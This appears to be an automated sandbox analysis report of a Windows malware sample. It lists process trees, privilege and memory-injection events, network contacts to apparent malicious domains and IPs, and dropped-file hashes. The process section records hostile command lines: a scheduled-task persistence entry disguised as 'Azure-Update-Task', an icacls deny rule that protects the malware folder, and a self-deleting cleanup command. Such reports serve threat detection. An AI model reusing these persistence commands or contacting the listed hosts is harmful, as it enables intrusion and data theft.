| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe
"C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CB3F.bat" "
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\1384.exe
C:\Users\Admin\AppData\Local\Temp\1384.exe
C:\Users\Admin\AppData\Local\Temp\1384.exe
C:\Users\Admin\AppData\Local\Temp\1384.exe
C:\Users\Admin\AppData\Local\Temp\2335.exe
C:\Users\Admin\AppData\Local\Temp\2335.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\ab53deb9-ed78-4480-8153-4fc7e31f7c86" /deny *S-1-1-0:(OI)(CI)(DE,DC)
C:\Users\Admin\AppData\Local\Temp\1384.exe
"C:\Users\Admin\AppData\Local\Temp\1384.exe" --Admin IsNotAutoStart IsNotTask
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4064 -s 1164
C:\Users\Admin\AppData\Local\Temp\1384.exe
"C:\Users\Admin\AppData\Local\Temp\1384.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build2.exe
"C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build2.exe"
C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build2.exe
"C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build2.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 1652
C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build3.exe
"C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build3.exe"
C:\Users\Admin\AppData\Local\Temp\9CDA.exe
C:\Users\Admin\AppData\Local\Temp\9CDA.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A085.bat" "
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\B352.exe
C:\Users\Admin\AppData\Local\Temp\B352.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 224 -s 1012
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 224 -s 944
C:\Users\Admin\AppData\Local\Temp\343B.exe
C:\Users\Admin\AppData\Local\Temp\343B.exe
C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build3.exe
"C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build3.exe"
C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe" & del "C:\ProgramData\*.dll"" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 5
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | trad-einmyus.com | udp |
| RU | 81.94.159.197:80 | trad-einmyus.com | tcp |
| US | 20.231.121.79:80 | tcp | |
| US | 8.8.8.8:53 | 197.159.94.81.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sdfjhuz.com | udp |
| BG | 93.152.141.65:80 | sdfjhuz.com | tcp |
| US | 8.8.8.8:53 | 65.141.152.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.2ip.ua | udp |
| US | 104.21.65.24:443 | api.2ip.ua | tcp |
| US | 8.8.8.8:53 | sportessentia.home.pl | udp |
| PL | 79.96.138.166:443 | sportessentia.home.pl | tcp |
| US | 8.8.8.8:53 | 166.138.96.79.in-addr.arpa | udp |
| US | 8.8.8.8:53 | theonlyreasonwhywe.pro | udp |
| US | 172.67.218.191:443 | theonlyreasonwhywe.pro | tcp |
| US | 8.8.8.8:53 | m2reg.ulm.ac.id | udp |
| ID | 103.23.232.80:80 | m2reg.ulm.ac.id | tcp |
| US | 8.8.8.8:53 | wisemassiveharmonious.shop | udp |
| US | 8.8.8.8:53 | colorfulequalugliess.shop | udp |
| US | 8.8.8.8:53 | 191.218.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.65.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.232.23.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 61.179.17.96.in-addr.arpa | udp |
| US | 172.67.185.152:443 | colorfulequalugliess.shop | tcp |
| US | 8.8.8.8:53 | 3.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.185.67.172.in-addr.arpa | udp |
| US | 104.21.65.24:443 | api.2ip.ua | tcp |
| BG | 93.152.141.65:80 | sdfjhuz.com | tcp |
| US | 8.8.8.8:53 | sajdfue.com | udp |
| US | 8.8.8.8:53 | 96.134.221.88.in-addr.arpa | udp |
| KR | 211.119.84.112:80 | sajdfue.com | tcp |
| KR | 211.119.84.112:80 | sajdfue.com | tcp |
| US | 8.8.8.8:53 | 112.84.119.211.in-addr.arpa | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 23.214.154.77:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | 77.154.214.23.in-addr.arpa | udp |
| DE | 5.75.208.156:80 | 5.75.208.156 | tcp |
| US | 8.8.8.8:53 | 156.208.75.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| RU | 81.94.159.197:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | resergvearyinitiani.shop | udp |
| US | 172.67.217.100:443 | resergvearyinitiani.shop | tcp |
| US | 8.8.8.8:53 | valowaves.com | udp |
| US | 172.67.192.62:443 | valowaves.com | tcp |
| US | 8.8.8.8:53 | technologyenterdo.shop | udp |
| US | 8.8.8.8:53 | lighterepisodeheighte.fun | udp |
| US | 8.8.8.8:53 | problemregardybuiwo.fun | udp |
| US | 8.8.8.8:53 | detectordiscusser.shop | udp |
| US | 8.8.8.8:53 | edurestunningcrackyow.fun | udp |
| US | 8.8.8.8:53 | pooreveningfuseor.pw | udp |
| US | 8.8.8.8:53 | turkeyunlikelyofw.shop | udp |
| US | 8.8.8.8:53 | associationokeo.shop | udp |
| US | 104.21.10.242:443 | associationokeo.shop | tcp |
| US | 8.8.8.8:53 | 100.217.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.192.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nessotechbd.com | udp |
| US | 192.185.16.114:443 | nessotechbd.com | tcp |
| US | 8.8.8.8:53 | 242.10.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.16.185.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.179.17.96.in-addr.arpa | udp |
| RU | 81.94.159.197:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | dham2fjg7wsuiqovkuaqkfc42rhfbctvzf4filsx5kq7iqvvd5n2tuad.onion.ly | udp |
| US | 209.141.39.59:443 | dham2fjg7wsuiqovkuaqkfc42rhfbctvzf4filsx5kq7iqvvd5n2tuad.onion.ly | tcp |
| US | 8.8.8.8:53 | 59.39.141.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.65.42.20.in-addr.arpa | udp |
| TR | 94.156.8.100:80 | 94.156.8.100 | tcp |
| US | 8.8.8.8:53 | 100.8.156.94.in-addr.arpa | udp |
Files
memory/4080-1-0x0000000000690000-0x0000000000790000-memory.dmp
memory/4080-2-0x00000000005C0000-0x00000000005CB000-memory.dmp
memory/4080-3-0x0000000000400000-0x0000000000474000-memory.dmp
memory/3324-4-0x00000000009A0000-0x00000000009B6000-memory.dmp
memory/4080-5-0x0000000000400000-0x0000000000474000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\CB3F.bat
| MD5 | 55cc761bf3429324e5a0095cab002113 |
| SHA1 | 2cc1ef4542a4e92d4158ab3978425d517fafd16d |
| SHA256 | d6cceb3c71b80403364bf142f2fa4624ee0be36a49bac25ed45a497cf1ce9c3a |
| SHA512 | 33f9f5cad22d291077787c7df510806e4ac31f453d288712595af6debe579fabed6cdf4662e46e6fa94de135b161e739f55cfae05c36c87af85ed6a6ad1c9155 |
C:\Users\Admin\AppData\Local\Temp\1384.exe
| MD5 | ae597691370226cc4354b9897415b115 |
| SHA1 | 3e89b4b1d81cdae205ac96f151bf3dc0fe3337ae |
| SHA256 | 10f5ba78f4d86b82127e167fee1ea0e6b26dd087ecfe933bda24e5d2685ad675 |
| SHA512 | f2db423695272ea3519d6329965baf4f0eee6dda62820406ecafcc13385380cb6279c097a8a610163835a181f845ccac7982c7f867b90abc5b553968b3ac7f24 |
memory/2936-21-0x0000000002120000-0x00000000021B5000-memory.dmp
memory/428-20-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2936-24-0x00000000021C0000-0x00000000022DB000-memory.dmp
memory/428-23-0x0000000000400000-0x0000000000537000-memory.dmp
memory/428-25-0x0000000000400000-0x0000000000537000-memory.dmp
memory/428-26-0x0000000000400000-0x0000000000537000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\2335.exe
| MD5 | e79d42e6b51653c6a459adc6e6cd0e7d |
| SHA1 | 19590e4efcea7b916825669075fb59de0aae0600 |
| SHA256 | 3e1451fbd94c852f561fdb5332a5a8576d940d95b1a8cff4dfc0285bc9fc0b14 |
| SHA512 | 17f70d269b7be8fe4d8fa2b5bca88188c318991ac168d54f37237bbacaf9804e8aa7e6b81a2320bcd61d2a109728461d8082cd69e6b0ed8f1f90600b1ecaed9f |
memory/1400-32-0x0000000000F40000-0x0000000000F96000-memory.dmp
memory/1400-33-0x0000000072AA0000-0x000000007318E000-memory.dmp
memory/4064-36-0x0000000000400000-0x000000000044B000-memory.dmp
memory/4064-40-0x0000000000400000-0x000000000044B000-memory.dmp
memory/1400-42-0x0000000072AA0000-0x000000007318E000-memory.dmp
memory/1400-41-0x0000000003220000-0x0000000005220000-memory.dmp
memory/4064-43-0x00000000011F0000-0x00000000011F1000-memory.dmp
memory/4064-44-0x0000000000400000-0x000000000044B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1384.exe
| MD5 | 352df45e024d25e823f2bbec1d0a3bd1 |
| SHA1 | a3fdd3cc5100fee635ea8bb54a239b136095e800 |
| SHA256 | 2bcd82a51628c8a3e55917e057238aa563e851086b82775a6f074ca53897aac3 |
| SHA512 | ef0cc0ccfdcfbfa5671acd13f85e22646bde5aabf3f9adfffdf0e486556866150a1fe5524878d56ce4a34f549186e2cc019993124e7d4ea37c6fcc0f5e47e6b8 |
memory/428-56-0x0000000000400000-0x0000000000537000-memory.dmp
memory/4652-59-0x00000000021E0000-0x0000000002274000-memory.dmp
memory/608-62-0x0000000000400000-0x0000000000537000-memory.dmp
memory/608-63-0x0000000000400000-0x0000000000537000-memory.dmp
memory/608-64-0x0000000000400000-0x0000000000537000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
| MD5 | 8202a1cd02e7d69597995cabbe881a12 |
| SHA1 | 8858d9d934b7aa9330ee73de6c476acf19929ff6 |
| SHA256 | 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5 |
| SHA512 | 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
| MD5 | 76807ba1e95ecb83f8565d00cf05c5b4 |
| SHA1 | 736eb91ea7061c996dc67c3d967301861deaaf49 |
| SHA256 | 2f4ba32566855a9fb757477e51faf62b8e2b9f3878b81029e46cd36de43a1e59 |
| SHA512 | 153dc5378143e2c20b105b90790c24b1f8a673df7a750d27eb988012bb871830ae1b5dd8d27b38f753883425d131ef48eb48f289f64691502ac31ae6f5bf8967 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
| MD5 | d67fa48cf6cf5f1818b732ea24db1d6e |
| SHA1 | 44858909775b98c384307149a53b231f084427f6 |
| SHA256 | 1dd5acc0e95a7e0a6eea0ce7e4ab2665c928db84a241f4006a06791343b84d27 |
| SHA512 | c89132c4ac4a3e34e37ba33d98347af7c6a0394eceafb043cfd99e5d41d68575287cc537831a3f42924c975f7716aa0c531c6f619fac2df1c17daca658b926a6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
| MD5 | b18c424040e11a16b1a7560819485dba |
| SHA1 | 8403fac73085093236a3c607590fd1c14d4a708b |
| SHA256 | 546c5c1bd196e29568210092d230d7fd9e0420faf0c245fa0b33b0ca779f3908 |
| SHA512 | 1c3b707a131c3774a38eb9cd522bd947c1ec7f59245c0232e67181c61e9eb1d926f0b7641b2930742c857f96c5cec689710804b6901fe8bcc65792490f7d686e |
memory/608-69-0x0000000000400000-0x0000000000537000-memory.dmp
memory/608-70-0x0000000000400000-0x0000000000537000-memory.dmp
C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build2.exe
| MD5 | 47704f454af8641dac1af2e2768d7881 |
| SHA1 | e3341bfdec84f69684aecde18cab2864519c7728 |
| SHA256 | a6a9375dd6e3b285bc6d65536a151a47dd136aced8180492f5ed6a391edf0d64 |
| SHA512 | 9aea598ee30342a88fedf5eca2b104e8c5587cd284bd43229581b04497c60e6a71e5392a171a5dfbe88a2e41269434922e21c3f7f9682e2ea10b27b104606b25 |
memory/1232-82-0x0000000000980000-0x0000000000A80000-memory.dmp
memory/2232-79-0x0000000000400000-0x0000000000644000-memory.dmp
memory/1232-83-0x00000000007B0000-0x00000000007E1000-memory.dmp
memory/608-88-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2232-84-0x0000000000400000-0x0000000000644000-memory.dmp
memory/608-90-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2232-91-0x0000000000400000-0x0000000000644000-memory.dmp
memory/608-92-0x0000000000400000-0x0000000000537000-memory.dmp
memory/608-93-0x0000000000400000-0x0000000000537000-memory.dmp
memory/1400-98-0x0000000003220000-0x0000000005220000-memory.dmp
memory/4064-100-0x0000000000400000-0x000000000044B000-memory.dmp
memory/2232-101-0x0000000000400000-0x0000000000644000-memory.dmp
memory/608-107-0x0000000000400000-0x0000000000537000-memory.dmp
C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build3.exe
| MD5 | 41b883a061c95e9b9cb17d4ca50de770 |
| SHA1 | 1daf96ec21d53d9a4699cea9b4db08cda6fbb5ad |
| SHA256 | fef2c8ca07c500e416fd7700a381c39899ee26ce1119f62e7c65cf922ce8b408 |
| SHA512 | cdd1bb3a36182575cd715a52815765161eeaa3849e72c1c2a9a4e84cc43af9f8ec4997e642702bb3de41f162d2e8fd8717f6f8302bba5306821ee4d155626319 |
memory/1232-112-0x00000000007B0000-0x00000000007E1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\9CDA.exe
| MD5 | c6c6e87f9f9ce1d439ff1edb7f9da640 |
| SHA1 | d6eb5d4886fcdf8e929cb980f6b9ae5c89be02bf |
| SHA256 | ccfc24113db127a895833163289adb3a99bfb034fa5f48c3020ba0e2643de806 |
| SHA512 | b514000a2817664dbab753fcf7d2e9d9f562f67072de493c04a0931f86a9c3b58f902773d1c6738f7620fd86ad1c95892c2f1594bd19223f735b25136774cd7f |
C:\Users\Admin\AppData\Local\Temp\9CDA.exe
| MD5 | 7bb6e6790d9f2339cf0bda35cbba47a9 |
| SHA1 | 4ad1b776f4b4289e55b8872976e7ce1984c5ea8a |
| SHA256 | 488222f6d7001124afdef37eec2de2202f566b84708b0e197127a9b7c06102aa |
| SHA512 | 9c67fd7329202d2c19295e134f2afef7ef3d4e2bc35f8711b6770e0ef5a02251cb1ed936865792e6c134d27b53776accd98ed07a7ca2f77dd0d2b66d7e767cbb |
memory/224-117-0x0000000000220000-0x0000000000F05000-memory.dmp
memory/224-125-0x0000000001410000-0x0000000001411000-memory.dmp
memory/224-126-0x0000000001420000-0x0000000001421000-memory.dmp
memory/224-127-0x0000000000220000-0x0000000000F05000-memory.dmp
memory/224-128-0x0000000001450000-0x0000000001451000-memory.dmp
memory/224-130-0x0000000003050000-0x0000000003051000-memory.dmp
memory/224-129-0x0000000003040000-0x0000000003041000-memory.dmp
memory/224-131-0x0000000003060000-0x0000000003061000-memory.dmp
memory/224-133-0x0000000000220000-0x0000000000F05000-memory.dmp
memory/224-134-0x0000000003080000-0x00000000030C0000-memory.dmp
memory/224-135-0x0000000003080000-0x00000000030C0000-memory.dmp
memory/224-136-0x0000000003080000-0x00000000030C0000-memory.dmp
memory/224-137-0x0000000003080000-0x00000000030C0000-memory.dmp
memory/224-138-0x0000000003080000-0x00000000030C0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\B352.exe
| MD5 | 8d6a2b7fa46fdc17a6b3ea5eae4ada26 |
| SHA1 | 8170fb4a321712b885d441aee0f003857af634aa |
| SHA256 | 24fbc78418171fc48495e47f9b3e0d4d2978ca32c45b075c2b8eca856c01e6ea |
| SHA512 | db7a4f8b1707f428ff50c11844b52903bc106a11bceecf37f7244baf74867ffaa1e7bb157e9baa7c3a0b7b7548e84bf1c5b6f39844db9ce80770d0bd546e230d |
C:\Users\Admin\AppData\Local\Temp\B352.exe
| MD5 | 3533293a2a9f1d6582e72b4e0214cf7e |
| SHA1 | 1049d46796e63b4d3007f5f0fa68d3c91b5ec02c |
| SHA256 | 6ab2d444e35f71e7896b2c8d8dafe65ef49a230a1bfa260d98ee1929c634dfeb |
| SHA512 | 9730f32371940ac3db2c5be83bed4d57ce4a55c300579d3db0c064501fbea39b96e2d440ee6ba46ab636b3944cf31a2b64b5efbbfbc3a6954377f2f2c9c51e1b |
memory/224-146-0x0000000000220000-0x0000000000F05000-memory.dmp
memory/3652-149-0x00007FF789760000-0x00007FF78A3C2000-memory.dmp
memory/3652-152-0x00007FF789760000-0x00007FF78A3C2000-memory.dmp
memory/3652-158-0x00007FF789760000-0x00007FF78A3C2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\343B.exe
| MD5 | 2896e0b13eb74b247121f5e97e7372dc |
| SHA1 | 554c0fd24c2dd0fcf2e997b4161601ae03aa01a4 |
| SHA256 | 33d6169260474dabc0c9f8fedc87114be77bfecd8767d503f88301d0332fe831 |
| SHA512 | c5e261d779920d21d866398148635739fa90905e793785aab00402b66909c3bafced3ad6547f04e077392c2a62790590af1cd3c9d7ac13974a0a6dd6b565befa |
C:\Users\Admin\AppData\Local\Temp\343B.exe
| MD5 | 4eda5246e489dfa5edadc1a46221b9b6 |
| SHA1 | 5d11b441365ea64090f34c68b4cf47b9d2d701dc |
| SHA256 | f141b5eee77d2391f8ff169914873e1219c2b47ebfde2b5bdfc0af7c6e08217b |
| SHA512 | 783b801030b15b53633509ed36c815d928a67e9c833d2c8a2cc368fda8a5b76386c34ca767636d0fd3d0262ee059af89784324701eac46f4867f8ea9e74f4625 |
memory/3376-163-0x00000000713F0000-0x0000000071ADE000-memory.dmp
memory/3376-164-0x0000000000F50000-0x00000000014A4000-memory.dmp
memory/3376-165-0x0000000005C50000-0x0000000005C60000-memory.dmp
memory/3376-166-0x0000000005D80000-0x0000000005E1C000-memory.dmp
memory/3376-167-0x0000000006440000-0x000000000696C000-memory.dmp
memory/4204-170-0x0000000000810000-0x0000000000910000-memory.dmp
memory/4204-171-0x00000000001F0000-0x00000000001F4000-memory.dmp
memory/4796-172-0x0000000000400000-0x0000000000406000-memory.dmp
memory/4796-175-0x0000000000400000-0x0000000000406000-memory.dmp
memory/4796-177-0x0000000000400000-0x0000000000406000-memory.dmp
memory/3652-181-0x00007FF789760000-0x00007FF78A3C2000-memory.dmp
memory/3376-182-0x00000000713F0000-0x0000000071ADE000-memory.dmp
memory/3376-183-0x0000000005C50000-0x0000000005C60000-memory.dmp
memory/3652-186-0x00007FF789760000-0x00007FF78A3C2000-memory.dmp
memory/3376-190-0x0000000006A70000-0x0000000006CAC000-memory.dmp
memory/3376-191-0x00000000062F0000-0x0000000006302000-memory.dmp
memory/3376-192-0x0000000007DF0000-0x0000000007F82000-memory.dmp
memory/3376-199-0x00000000063A0000-0x00000000063B0000-memory.dmp
memory/3376-200-0x0000000005C50000-0x0000000005C60000-memory.dmp
memory/3376-198-0x0000000005C50000-0x0000000005C60000-memory.dmp
\Users\Admin\AppData\Local\Temp\Protect544cd51a.dll
| MD5 | 544cd51a596619b78e9b54b70088307d |
| SHA1 | 4769ddd2dbc1dc44b758964ed0bd231b85880b65 |
| SHA256 | dfce2d4d06de6452998b3c5b2dc33eaa6db2bd37810d04e3d02dc931887cfddd |
| SHA512 | f56d8b81022bb132d40aa78596da39b5c212d13b84b5c7d2c576bbf403924f1d22e750de3b09d1be30aea359f1b72c5043b19685fc9bf06d8040bfee16b17719 |
memory/3376-202-0x0000000005C50000-0x0000000005C60000-memory.dmp
memory/3376-201-0x0000000005C50000-0x0000000005C60000-memory.dmp
memory/3376-203-0x0000000005C50000-0x0000000005C60000-memory.dmp
memory/3376-206-0x0000000008310000-0x0000000008410000-memory.dmp
memory/3376-210-0x0000000008310000-0x0000000008410000-memory.dmp
memory/3376-208-0x0000000005C50000-0x0000000005C60000-memory.dmp
memory/1660-212-0x0000000000400000-0x000000000063B000-memory.dmp
memory/3376-211-0x00000000713F0000-0x0000000071ADE000-memory.dmp
\ProgramData\mozglue.dll
| MD5 | c8fd9be83bc728cc04beffafc2907fe9 |
| SHA1 | 95ab9f701e0024cedfbd312bcfe4e726744c4f2e |
| SHA256 | ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a |
| SHA512 | fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040 |
\ProgramData\nss3.dll
| MD5 | 1cc453cdf74f31e4d913ff9c10acdde2 |
| SHA1 | 6e85eae544d6e965f15fa5c39700fa7202f3aafe |
| SHA256 | ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5 |
| SHA512 | dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571 |
memory/1660-284-0x0000000000400000-0x000000000063B000-memory.dmp